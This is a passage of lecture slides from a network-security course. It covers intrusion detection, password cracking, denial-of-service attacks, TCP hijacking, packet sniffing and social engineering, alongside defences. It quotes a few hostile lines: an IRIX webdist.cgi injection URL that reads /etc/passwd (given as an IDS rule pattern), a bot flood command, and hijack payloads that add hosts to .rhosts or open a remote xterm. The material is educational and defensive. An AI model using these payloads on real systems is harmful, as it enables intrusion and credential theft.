• Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc.
• Example
• IRIX vulnerability in webdist.cgi
• Can make a rule to drop packets containing the line
• “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”

• However, IDS is only useful if contingency plans are in place to curb

attacks as they are occurring

104
Minor Detour…
• Say we got the /etc/passwd file from the IRIX server
• What can we do with it?

105
Dictionary Attack
• We can run a dictionary attack on the passwords
• The passwords in /etc/passwd are encrypted with the crypt(3) function (one-
way hash)
• Can take a dictionary of words, crypt() them all, and compare with the hashed
passwords
• This is why your passwords should be meaningless random junk!
• For example, “sdfo839f” is a good password
• That is not my password
• Please don’t try it either

106
Denial of Service
• Purpose: Make a network service unusable, usually by overloading
the server or network
• Many different kinds of DoS attacks
• SYN flooding
• SMURF
• Distributed attacks
• Mini Case Study: Code-Red

107
Denial of Service
• SYN flooding attack
• Send SYN packets with bogus source address
• Why?
• Server responds with SYN ACK and keeps state about TCP half-open
connection
• Eventually, server memory is exhausted with this state
• Solution: use “SYN cookies”
• In response to a SYN, create a special “cookie” for the connection, and forget
everything else
• Then, can recreate the forgotten information when the ACK comes in from a
legitimate connection
108
Denial of Service

109
Denial of Service
• SMURF
• Source IP address of a broadcast ping is forged
• Large number of machines respond back to victim, overloading it

110
Denial of Service
IC M P echo (spoofed source address of victim )
S ent to IP broadcast address
IC M P echo reply

Internet

P erpetrator V ictim

111
Denial of Service
• Distributed Denial of Service
• Same techniques as regular DoS, but on a much larger scale
• Example: Sub7Server Trojan and IRC bots
• Infect a large number of machines with a “zombie” program
• Zombie program logs into an IRC channel and awaits commands
• Example:
• Bot command: !p4 207.71.92.193
• Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000
• Sends 10,000 64k packets to the host (655MB!)
• Read more at: http://grc.com/dos/grcdos.htm

112
Denial of Service
• Mini Case Study – CodeRed
• July 19, 2001: over 359,000 computers infected with Code-Red in less than 14
hours
• Used a recently known buffer exploit in Microsoft IIS
• Damages estimated in excess of $2.6 billion

113
Denial of Service
• Why is this under the Denial of Service category?
• CodeRed launched a DDOS attack against www1.whitehouse.gov from the
20th to the 28th of every month!
• Spent the rest of its time infecting other hosts

114
Denial of Service
• How can we protect ourselves?
• Ingress filtering
• If the source IP of a packet comes in on an interface which does not have a route to that
packet, then drop it
• RFC 2267 has more information about this
• Stay on top of CERT advisories and the latest security patches
• A fix for the IIS buffer overflow was released sixteen days before CodeRed had been
deployed!

115
TCP Attacks
• Recall how IP works…
• End hosts create IP packets and routers process them purely based on
destination address alone
• Problem: End hosts may lie about other fields which do not affect
delivery
• Source address – host may trick destination into believing that the packet is
from a trusted source
• Especially applications which use IP addresses as a simple authentication method
• Solution – use better authentication methods

116
TCP Attacks
• TCP connections have associated state
• Starting sequence numbers, port numbers
• Problem – what if an attacker learns these values?
• Port numbers are sometimes well known to begin with (ex. HTTP uses port
80)
• Sequence numbers are sometimes chosen in very predictable ways

117
TCP Attacks
• If an attacker learns the associated TCP state for the connection, then
the connection can be hijacked!
• Attacker can insert malicious data into the TCP stream, and the
recipient will believe it came from the original source
• Ex. Instead of downloading and running new program, you download a virus
and execute it

118
TCP Attacks
• Say hello to Alice, Bob and Mr. Big Ears

119
TCP Attacks
• Alice and Bob have an established TCP connection

120
TCP Attacks
• Mr. Big Ears lies on the path between Alice and Bob on the network
• He can intercept all of their packets

121
TCP Attacks
• First, Mr. Big Ears must drop all of Alice’s packets since they must not
be delivered to Bob (why?)

Packets

The Void

122
TCP Attacks
• Then, Mr. Big Ears sends his malicious packet with the next ISN
(sniffed from the network)

ISN, SRC=Alice

123
TCP Attacks
• What if Mr. Big Ears is unable to sniff the packets between Alice and
Bob?
• Can just DoS Alice instead of dropping her packets
• Can just send guesses of what the ISN is until it is accepted
• How do you know when the ISN is accepted?
• Mitnick: payload is “add self to .rhosts”
• Or, “xterm -display MrBigEars:0”

124
TCP Attacks
• Why are these types of TCP attacks so dangerous?

Web server Trusting web client

Malicious user
125
TCP Attacks
• How do we prevent this?
• IPSec
• Provides source authentication, so Mr. Big Ears cannot pretend to be Alice
• Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without
knowing what the session key is

126
Packet Sniffing
• Recall how Ethernet works …
• When someone wants to send a packet to some else …
• They put the bits on the wire with the destination MAC address …
• And remember that other hosts are listening on the wire to detect for
collisions …
• It couldn’t get any easier to figure out what data is being transmitted
over the network!

127
Packet Sniffing
• This works for wireless too!
• In fact, it works for any broadcast-based medium

128
Packet Sniffing
• What kinds of data can we get?
• Asked another way, what kind of information would be most useful to
a malicious user?
• Answer: Anything in plain text
• Passwords are the most popular

129
Packet Sniffing
• How can we protect ourselves?
• SSH, not Telnet
• Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)
• Now that I have told you this, please do not exploit this information
• Packet sniffing is, by the way, prohibited by Computing Services
• HTTP over SSL
• Especially when making purchases with credit cards!
• SFTP, not FTP
• Unless you really don’t care about the password or data
• Can also use KerbFTP (download from MyAndrew)
• IPSec
• Provides network-layer confidentiality

130
Social Problems
• People can be just as dangerous as unprotected computer systems
• People can be lied to, manipulated, bribed, threatened, harmed, tortured,
etc. to give up valuable information
• Most humans will breakdown once they are at the “harmed” stage, unless
they have been specially trained

131
Social Problems
• Fun Example 1:
• “Hi, I’m your AT&T rep, I’m stuck on a pole. I need you to punch a bunch of
buttons for me”

132
Social Problems
• Fun Example 2:
• Someone calls you in the middle of the night
• “Have you been calling Egypt for the last six hours?”
• “No”
• “Well, we have a call that’s actually active right now, it’s on your calling card and it’s to
Egypt and as a matter of fact, you’ve got about $2000 worth of charges on your card and
… read off your AT&T card number and PIN and then I’ll get rid of the charge for you”

133
Social Problems
• Fun Example 3:
• Who saw Office Space?
• In the movie, the three disgruntled employees installed a money-stealing
worm onto the companies systems
• They did this from inside the company, where they had full access to the
companies systems
• What security techniques can we use to prevent this type of access?

134
Social Problems
• There aren’t always solutions to all of these problems
• Humans will continue to be tricked into giving out information they shouldn’t
• Educating them may help a little here, but, depending on how bad you want the information,
there are a lot of bad things you can do to get it
• So, the best that can be done is to implement a wide variety of solutions and
more closely monitor who has access to what network resources and information
• But, this solution is still not perfect

135
Conclusions
• The Internet works only because we implicitly trust one another
• It is very easy to exploit this trust
• The same holds true for software
• It is important to stay on top of the latest CERT security advisories to
know how to patch any security holes

136
Security related URLs
• http://www.robertgraham.com/pubs/network-intrusion-detection.ht
ml
• http://online.securityfocus.com/infocus/1527
• http://www.snort.org/
• http://www.cert.org/
• http://www.nmap.org/
• http://grc.com/dos/grcdos.htm
• http://lcamtuf.coredump.cx/newtcp/

137